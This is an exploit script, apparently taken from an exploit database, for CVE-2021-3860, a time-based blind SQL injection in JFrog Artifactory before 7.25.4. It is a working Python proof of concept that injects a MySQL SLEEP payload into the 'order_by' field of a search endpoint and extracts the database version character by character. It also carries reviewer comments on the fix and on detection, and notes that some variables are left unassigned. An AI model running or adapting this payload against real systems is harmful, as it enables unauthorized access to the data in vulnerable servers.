
JFrog Artifactory < 7.25.4 - Blind SQL Injection - CVE-2021-3860

# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date:
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below
#
# Defender notes (review):
# - The untrusted value is the "order_by" field of the JSON body POSTed to
#   /ui/api/v1/global-search/bundles/received.  The probe is purely
#   time-based (MySQL SLEEP(5)); the only signal this script reads is the
#   wall-clock round trip of each request.
# - Fix: the header above lists Artifactory releases prior to 7.25.4 as
#   affected, so upgrading to a fixed release is the mitigation.
# - Detection: alert on "order_by" values on this endpoint that contain SQL
#   syntax (SELECT, CASE, SLEEP, MID, VERSION), and on bursts of POSTs to it
#   from one authenticated session with ~5 s server-side latency.


# Silence urllib3's warning about the unverified TLS request made below (verify=False).
warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
# Base URL of the target instance, read interactively; it is joined with a
# path below, so presumably no trailing slash is expected -- confirm.
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint
# 1-based character index passed to MySQL MID(); advanced by one per recovered character.
pos = 1
# cookies = Replace this with captured cookies from the above endpoint
# NOTE(review): `headers`, `cookies` and `version` are never assigned in this
# listing, so as pasted the loop below raises NameError on first use.


while True:
    # One guess per candidate character for the current position of VERSION().
    for i in string.digits + '.':
        # Conditional delay: the server side sleeps 5 s only when the guessed
        # character matches; otherwise the expression evaluates to 4616.
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        # verify=False disables TLS certificate validation for this request.
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        # Wall-clock round trip, measured client-side.
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        # Stops once six characters have been collected (checked only after a
        # non-matching guess, since a match breaks out of the for-loop first).
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)
           